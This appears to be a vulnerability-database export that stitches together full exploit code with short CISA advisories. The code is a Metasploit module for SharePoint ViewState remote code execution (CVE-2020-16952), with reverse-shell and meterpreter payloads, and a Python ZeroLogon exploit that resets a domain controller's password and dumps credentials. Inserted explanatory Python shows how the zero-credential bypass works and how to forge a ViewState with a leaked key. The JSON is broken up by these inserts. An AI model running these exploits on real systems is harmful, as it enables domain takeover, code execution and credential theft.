res.headers['MicrosoftSharePointTeamServices'])\n return CheckCode::Unknown('Target does not appear to be running SharePoint.')\n end\n\n unless (build = build_header.scan(/^([\\d.]+):/).flatten.first)\n return CheckCode::Detected('Target did not respond with SharePoint build.')\n end\n\n if vuln_builds.any? 
{ |build_range| Gem::Version.new(build).between?(*build_range) }\n return CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\")\n end\n\n CheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\")\n end\n\n def exploit\n unless username && password\n fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation')\n end\n\n if (@validation_key = datastore['VALIDATION_KEY'])\n print_status(\"Using ViewState validation key #{@validation_key}\")\n else\n create_ssi_page\n leak_web_config\n end\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def create_ssi_page\n print_status(\"Creating page for SSI: #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'PUT',\n 'uri' => ssi_path,\n 'data' => ssi_page\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless [200, 201].include?(res.code)\n if res.code == 401\n fail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\")\n end\n\n fail_with(Failure::NotFound, 'Failed to create page')\n end\n\n print_good('Successfully created page')\n @page_created = true\n end\n\n def leak_web_config\n print_status('Leaking web.config')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => ssi_path,\n 'headers' => {\n ssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\")\n end\n\n unless (web_config = res.get_xml_document.at('//configuration'))\n fail_with(Failure::NotFound, 'Failed to extract 
web.config from response')\n end\n\n print_good(\"Saved web.config to: #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\")\n\n unless (@validation_key = extract_viewstate_validation_key(web_config))\n fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')\n end\n\n print_good(\"ViewState validation key: #{@validation_key}\")\n ensure\n delete_ssi_page if @page_created\n end\n\n def delete_ssi_page\n print_status(\"Deleting #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'DELETE',\n 'uri' => ssi_path,\n 'partial' => true\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 204\n print_warning('Failed to delete page')\n return\n end\n\n print_good('Successfully deleted page')\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),\n 'vars_post' => {\n '__VIEWSTATE' => generate_viewstate_payload(\n cmd,\n extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx\n algo: 'sha256',\n key: pack_viewstate_validation_key(@validation_key)\n )\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good('Successfully executed command')\n end\n\n def ssi_page\n <<~XML\n <WebPartPages:DataFormWebPart runat=\"server\">\n <ParameterBindings>\n <ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" />\n </ParameterBindings>\n <xsl>\n <xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n <xsl:param name=\"#{ssi_param}\" />\n <xsl:template match=\"/\">\n 
<xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" />\n </xsl:template>\n </xsl:stylesheet>\n </xsl>\n </WebPartPages:DataFormWebPart>\n XML\n end\n\n def ssi_path\n @ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\")\n end\n\n def ssi_header\n @ssi_header ||= rand_text_alphanumeric(8..42)\n end\n\n def ssi_param\n @ssi_param ||= rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35071", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-01T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-18T00:00:00", "type": "zdt", "title": "ZeroLogon - Netlogon Elevation of Privilege Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-18T00:00:00", "id": "1337DAY-ID-35274", "href": "https://0day.today/exploit/description/35274", "sourceData": "# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege\n# Date: 2020-10-04\n# Exploit Author: West Shepherd\n# Vendor Homepage: https://www.microsoft.com\n# 
Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2\n# Tested on: Microsoft Windows Server 2016 Standard x64\n# CVE : CVE-2020-1472\n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code\n# Sources: https://www.secura.com/pathtoimg.php?id=2055\n# Requirements: python3 and impacket 0.9.21+ (tested using this version)\n#!/usr/bin/env python3\nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs\nfrom binascii import hexlify, unhexlify\nfrom subprocess import check_call\nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED\nfrom impacket.dcerpc.v5 import nrpc, epm, transport\nfrom impacket import crypto, version\nfrom impacket.examples import logger\nfrom Cryptodome.Cipher import AES\nfrom struct import pack, unpack\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\n\nclass Exploit:\n    def __init__(\n        self,\n        name='',\n        address='',\n        attempts=2000,\n        password=''\n    ):\n        name = name.rstrip('$')\n        self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\\\n            .ServerSecureChannel\n        self.authenticator = self.getAuthenticator(stamp=0)\n        self.clearNewPasswordBlob = b'\\x00' * 516\n        self.primaryName = ('\\\\%s' % name) + '\\x00'\n        self.accountName = ('%s$' % name) + '\\x00'\n        self.computerName = name + '\\x00'\n        self.clientCredential = b'\\x00' * 8\n        self.clientChallenge = b'\\x00' * 8\n        self.negotiateFlags = 0x212fffff\n        self.address = address\n        self.max = attempts\n        self.dce = None\n        self.sessionKey = None\n        self.clientStoredCredential = None\n        self.password = password\n\n    def encodePassword(self, password):\n        if isinstance(password, str):\n            password = password.encode('utf-8')\n        return b'\\x00' * (512 - len(password))\\\n            + password \\\n            + pack('<L', len(password))\n\n    def getAuthenticator(self, creds=b'\\x00' * 8, stamp=10):\n        authenticator = nrpc.NETLOGON_AUTHENTICATOR()\n        authenticator['Credential'] = creds\n        authenticator['Timestamp'] = stamp\n        return authenticator\n\n    def serverReqChallenge(self):\n        try:\n            binding = epm.hept_map(\n                self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'\n            )\n            self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()\n            self.dce.connect()\n            self.dce.bind(nrpc.MSRPC_UUID_NRPC)\n            return nrpc.hNetrServerReqChallenge(\n                self.dce,\n                self.primaryName,\n                self.computerName,\n                self.clientChallenge\n            )\n        except BaseException as ex:\n            self.logError(ex)\n\n    def serverAuthenticate(self):\n        try:\n            auth = nrpc.hNetrServerAuthenticate3(\n                self.dce,\n                self.primaryName,\n                self.accountName,\n                self.secureChannelType,\n                self.computerName,\n                self.clientCredential,\n                self.negotiateFlags\n            )\n            assert auth['ErrorCode'] == 0\n            self.logInfo('successfully authenticated')\n            return True\n        except nrpc.DCERPCSessionError as ex:\n            self.dce = None\n            if ex.get_error_code() == 0xc0000022:\n                return None\n            else:\n                self.logFail(ex.get_error_code())\n        except BaseException as ex:\n            self.dce = None\n            self.logFail(ex)\n        self.dce = None\n\n    def serverPasswordSet(self):\n        try:\n            return nrpc.hNetrServerPasswordSet2(\n                self.dce,\n                self.primaryName,\n                self.accountName,\n                self.secureChannelType,\n                self.computerName,\n                self.authenticator,\n                self.clearNewPasswordBlob\n            )\n        except BaseException as ex:\n            self.logError(ex)\n\n    def authenticate(self):\n        self.logInfo(\n            'checking target, attempting to authenticate %d max attempts' % self.max\n        )\n        for attempt in range(0, self.max):\n            self.logInfo('attempt %d' % attempt)\n            self.serverReqChallenge()\n            self.serverAuthenticate()\n            if self.dce is not None:\n                break\n        if self.dce:\n            return True\n        else:\n            self.logError('failed to authenticate')\n\n    def exploit(self):\n        self.logInfo('attempting password reset')\n        reset = self.serverPasswordSet()\n        if reset['ErrorCode'] == 0:\n            self.logInfo('successfully reset password')\n        else:\n            self.logError('failed to reset password')\n        return self\n\n    def ComputeNetlogonCredentialAES(self, challenge):\n        return nrpc.ComputeNetlogonCredentialAES(\n            challenge,\n            self.sessionKey\n        )\n\n    def logInfo(self, message):\n        sys.stdout.write(\"[+] %s\\n\" % str(message))\n        return self\n\n    def logError(self, message):\n        sys.stderr.write(\"[-] error %s\\n\" % str(message))\n\n    def logFail(self, message):\n        sys.stderr.write(\"[!] failure %s\\n\" % str(message))\n        sys.exit(2)\n\n    def restore(self):\n        self.logInfo('attempting to restore password')\n        self.clientChallenge = b'12345678'\n        try:\n            self.primaryName = NULL\n            challenge = self.serverReqChallenge()\n            self.sessionKey = nrpc.ComputeSessionKeyAES(\n                '', self.clientChallenge, challenge['ServerChallenge']\n            )\n            self.clientCredential = self.ComputeNetlogonCredentialAES(\n                self.clientChallenge\n            )\n            try:\n                self.serverAuthenticate()\n            except Exception as e:\n                if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:\n                    raise\n            self.logInfo('restoring password')\n            self.clientStoredCredential = pack('<Q', unpack('<Q', self.clientCredential)[0] + 10)\n            self.authenticator = self.getAuthenticator(\n                creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)\n            )\n            self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(\n                self.encodePassword(self.password)\n            )\n            reset = self.serverPasswordSet()\n            if reset['ErrorCode'] == 0:\n                self.logInfo('successfully restored password')\n            else:\n                self.logError('failed to restore password')\n        except Exception as ex:\n            self.logError(ex)\n        return self\n\n\nif __name__ == '__main__':\n    info = r\"\"\"\nNOTE - Exploitation will break the DC until restored, recommended guidelines:\n\n    1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:\n        cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>\n\n    2. Exploit the DC - this will break the DC until restored:\n        cve-2020-1472.py -do exploit -target <NETBIOS NAME> -ip <IP>\n\n    3. Dump the DC - for the DA hashes, this will not contain the machine hex-pass:\n        secretsdump.py -just-dc -no-pass <NETBIOS NAME>\\$@<IP>\n\n    4. Dump the DC again - use the DA hash to get the machines hex-pass:\n        secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>\n\n    5. Restore target - this fixes the DC:\n        cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> -hex <HEXPASS>\n\"\"\"\n    parser = argparse.ArgumentParser(\n        description='CVE-2020-1472 ZeroLogon Exploit - Netlogon Elevation of Privilege',\n        add_help=True\n    )\n    try:\n        parser.add_argument('-do', default='check', action='store',\n                            help='What to do (default check): [check|restore|exploit]')\n        parser.add_argument('-target', action='store',\n                            help='NETBIOS name of target DC (not the FQDN)')\n        parser.add_argument('-ip', action='store',\n                            help='IP address of target DC')\n        parser.add_argument('-password', default='', action='store',\n                            help='The plaintext password to use to reset the DC')\n        parser.add_argument('-hex', default='', action='store',\n                            help='The hex password to use to restore the DC (recommended)')\n        parser.add_argument('-max', default=2000, action='store',\n                            help='Max attempts to authenticate with the DC (usually ~300 or less)')\n\n        if len(sys.argv) < 3:\n            parser.print_help()\n            print(info)\n            sys.exit(1)\n        options = parser.parse_args()\n\n        if options.do.lower() == 'check':\n            Exploit(\n                name=options.target,\n                address=options.ip,\n                attempts=int(options.max)\n            ).authenticate()\n        elif options.do.lower() == 'exploit':\n            exp = Exploit(\n                name=options.target,\n                address=options.ip,\n                attempts=int(options.max)\n            )\n            if exp.authenticate():\n                exp.exploit()\n        elif options.do.lower() == 'restore':\n            if options.hex != '' and options.password == '':\n                options.password = unhexlify(options.hex)\n            if options.password != '':\n                exp = Exploit(\n                    name=options.target,\n                    address=options.ip,\n                    password=options.password\n                ).restore()\n            else:\n                parser.print_help()\n\n    except Exception as error:\n        sys.stderr.write('[-] error in main %s\\n' % str(error))\n", "sourceHref": "https://0day.today/exploit/35274", "cvss": {"score": 9.3, "vector": 
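Both Zerologon implementations above loop up to 2000 times sending an all-zero client challenge and an all-zero client credential, and the module description states this succeeds about 1 in 256 tries. The following is an added example, not part of either exploit or of the page, showing why: MS-NRPC computes the credential as AES-CFB8 under the session key with a fixed all-zero IV, and CFB8 with a zero IV turns an all-zero input into an all-zero output whenever the first byte of the block encryption of the zero block is 0x00. The block function is real AES when the `cryptography` package is installed; otherwise it falls back to a keyed SHA-256 stand-in (an assumption of this example, labelled in the code), which preserves the argument because CFB8 only ever consumes the first byte of each block output.

```python
"""
Added example (not part of the page's exploit code): why the Zerologon
login check succeeds about once in 256 tries.

MS-NRPC computes the client credential as AES-CFB8(session_key, IV = 0)
over the 8-byte client challenge. In CFB8 every output byte is
P[i] XOR E_k(register)[0] and the register then shifts that ciphertext
byte in. With IV = 0 and an all-zero challenge the register stays zero
for as long as the leading byte of E_k(0^16) is 0x00, which happens for
roughly one session key in 256. The attacker never learns the key: it
sends challenge = 0 and credential = 0 and retries against fresh server
challenges (hence fresh session keys) until one of them fits.
"""
import hashlib

BLOCK = 16

try:
    # Real AES when the `cryptography` package is available.
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
        return enc.update(block) + enc.finalize()
except ImportError:
    # Assumption: a keyed SHA-256 stand-in for the AES block function. CFB8
    # consumes only the first byte of E_k(register) per step, so the
    # zero-output argument below is the same for any pseudorandom block
    # function; only which keys happen to "win" differs.
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8 over a 16-byte block cipher, as ComputeNetlogonCredential uses it."""
    register = bytes(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, register)[0]
        out.append(c)
        register = register[1:] + bytes([c])   # shift the ciphertext byte in
    return bytes(out)


def zero_credential_accepted(session_key: bytes) -> bool:
    """What the DC computes for the attacker's all-zero challenge, compared
    with the all-zero credential the attacker always sends."""
    expected = cfb8_encrypt(session_key, bytes(BLOCK), bytes(8))
    return expected == bytes(8)


def zero_credential_iff_zero_first_byte(session_key: bytes) -> bool:
    """The credential is all-zero exactly when E_k(0^16)[0] == 0x00."""
    first_byte_zero = block_encrypt(session_key, bytes(BLOCK))[0] == 0
    return zero_credential_accepted(session_key) == first_byte_zero


def acceptance_rate(trials: int) -> float:
    """Fraction of deterministically derived 16-byte session keys that accept
    the zero credential; the expected value is 1/256, about 0.0039."""
    hits = 0
    for i in range(trials):
        key = hashlib.sha256(b"session-key" + i.to_bytes(4, "big")).digest()[:BLOCK]
        hits += zero_credential_accepted(key)
    return hits / trials


if __name__ == "__main__":
    rate = acceptance_rate(8192)
    print(f"zero credential accepted for {rate:.4%} of keys (expected {1/256:.4%})")
    print(f"expected attempts before success: ~{round(1 / rate) if rate else 'n/a'}")
```

The geometric expectation (about 256 attempts, with the `~300` the Python exploit's usage text mentions being a typical observed figure) is why both tools cap at 2000: the chance of 2000 consecutive misses is (255/256)^2000, well under 0.1 percent. The fix on the patched DC side is not a different mode but enforcing secure RPC and rejecting the zero-challenge pattern, so the same client loop returns STATUS_ACCESS_DENIED every time.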
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:35", "description": "The United Kingdom (UK) National Cyber Security Centre (NCSC) has released an [Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations >) to address a vulnerability\u2014CVE-2020-16952\u2014affecting Microsoft SharePoint server. An attacker could exploit this vulnerability to take control of an affected system. Applying patches from Microsoft\u2019s October 2020 Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) can prevent exploitation of this vulnerability.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the [NCSC Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations>) and the Microsoft Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T00:00:00", "type": "cisa", "title": "NCSC Releases Alert on Microsoft SharePoint Vulnerability", 
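The SharePoint module on this page leaks `web.config` through the SSI, extracts the `<machineKey>` validation key, and then posts a `__VIEWSTATE` to `/_layouts/15/zoombldr.aspx` signed with `algo: 'sha256'` and the packed generator `63E6434F` as the MAC modifier. The following is an added example, not code from the module, CISA or Microsoft, that carries out that signing arithmetic and the matching verification in Python. The `<machineKey>` element is constructed for the example and its key value is made up; the payload is a placeholder byte string, not a serialised gadget chain.

```python
"""
Added example (not from the Metasploit module on this page): the MAC
arithmetic that turns a leaked validationKey into a forgeable __VIEWSTATE,
plus the check a defender can run to tell whether a given key signed a token.
"""
import base64
import hashlib
import hmac
import struct
import xml.etree.ElementTree as ET

# Constructed stand-in for the <machineKey> that the SSI leaks out of
# web.config; the key material here is made up for this example.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="FEDCBA9876543210FEDCBA9876543210"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
"""

# __VIEWSTATEGENERATOR of /_layouts/15/zoombldr.aspx, as the module uses it.
ZOOMBLDR_GENERATOR = "63E6434F"

DIGESTS = {"HMACSHA256": hashlib.sha256, "SHA1": hashlib.sha1}


def extract_machine_key(web_config_xml):
    """Return (validationKey bytes, validation algorithm) from a web.config."""
    root = ET.fromstring(web_config_xml)
    mk = root.find("./system.web/machineKey")
    if mk is None or not mk.get("validationKey"):
        raise ValueError("no usable <machineKey validationKey=...> element")
    return bytes.fromhex(mk.get("validationKey")), mk.get("validation", "SHA1")


def pack_generator(generator_hex):
    """The generator is a 32-bit value; ASP.NET appends it little-endian
    to the payload as the MAC modifier, binding the token to one page."""
    return struct.pack("<I", int(generator_hex, 16))


def sign_viewstate(payload, key, generator_hex, algo="HMACSHA256"):
    """Legacy MachineKey MAC: HMAC(key, payload || modifier), appended to the payload."""
    mac = hmac.new(key, payload + pack_generator(generator_hex), DIGESTS[algo]).digest()
    return base64.b64encode(payload + mac).decode()


def verify_viewstate(viewstate_b64, key, generator_hex, algo="HMACSHA256"):
    """Constant-time check of a __VIEWSTATE against a key and page generator."""
    raw = base64.b64decode(viewstate_b64)
    n = DIGESTS[algo]().digest_size
    if len(raw) <= n:
        return False
    payload, mac = raw[:-n], raw[-n:]
    expected = hmac.new(key, payload + pack_generator(generator_hex), DIGESTS[algo]).digest()
    return hmac.compare_digest(mac, expected)


if __name__ == "__main__":
    key, algo = extract_machine_key(SAMPLE_WEB_CONFIG)
    # Constructed placeholder for the serialised ObjectStateFormatter payload.
    payload = b"\xff\x01" + b"constructed placeholder, not a gadget chain"
    token = sign_viewstate(payload, key, ZOOMBLDR_GENERATOR, algo)
    print("forged __VIEWSTATE:", token[:40] + "...")
    print("accepted for zoombldr.aspx:", verify_viewstate(token, key, ZOOMBLDR_GENERATOR, algo))
    print("accepted for another page:", verify_viewstate(token, key, "00000000", algo))
```

Two things follow from the construction. The generator only binds a token to one page, which is why the module targets a fixed `.aspx` whose generator it knows rather than any page; it adds no secrecy. And nothing in the MAC depends on the requesting user unless the application sets `ViewStateUserKey`, so once `validationKey` has left `web.config` the only real remedy is to rotate it (and apply the October update that closes the SSI leak).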
"bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-16T00:00:00", "id": "CISA:48962A3B37B032DCF622B3E3135B8A1A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:40", "description": "Microsoft has released a security update to address a protocol vulnerability\u2014CVE-2020-16898\u2014in Windows Transmission Control Protocol (TCP)/IP stack handling of Internet Control Message Protocol version 6 (ICMPv6) Router Advertisement packets. A remote attacker could exploit this vulnerability to take control of an affected system or cause a denial-of-service condition. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft\u2019s [Security Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) for more information, and apply the necessary updates or workaround. 
\n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/14/microsoft-addresses-windows-tcpip-rcedos-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T00:00:00", "type": "cisa", "title": "Microsoft Addresses Windows TCP/IP RCE/DoS Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-14T00:00:00", "id": "CISA:348CDAC76EADE8EE621368419146CDE1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/14/microsoft-addresses-windows-tcpip-rcedos-vulnerability", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-19T16:33:40", "description": "", "cvss3": {}, "published": "2020-10-19T00:00:00", "type": "packetstorm", "title": "Microsoft SharePoint 
SSI / ViewState Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-19T00:00:00", "id": "PACKETSTORM:159612", "href": "https://packetstormsecurity.com/files/159612/Microsoft-SharePoint-SSI-ViewState-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::ViewState \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE', \n'Description' => %q{ \nThis module exploits a server-side include (SSI) in SharePoint to leak \nthe web.config file and forge a malicious ViewState with the extracted \nvalidation key. \n \nThis exploit is authenticated and requires a user with page creation \nprivileges, which is a standard permission in SharePoint. \n \nThe web.config file will be stored in loot once retrieved, and the \nVALIDATION_KEY option can be set to short-circuit the SSI and trigger \nthe ViewState deserialization. \n \nTested against SharePoint 2019 on Windows Server 2016. 
\n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-16952'], \n['URL', 'https://srcincite.io/advisories/src-2020-0022/'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952'] \n], \n'DisclosureDate' => '2020-10-13', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n], \n[ \n'Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' \n} \n], \n[ \n'PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'DotNetGadgetChain' => :TypeConfuseDelegate \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time \n'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('VALIDATION_KEY', [false, 'ViewState validation key']), \n# \"Promote\" these advanced options so we don't have to pass around our own \nOptString.new('HttpUsername', [false, 'SharePoint username']), \nOptString.new('HttpPassword', [false, 'SharePoint password']) \n]) \nend \n \ndef post_auth? 
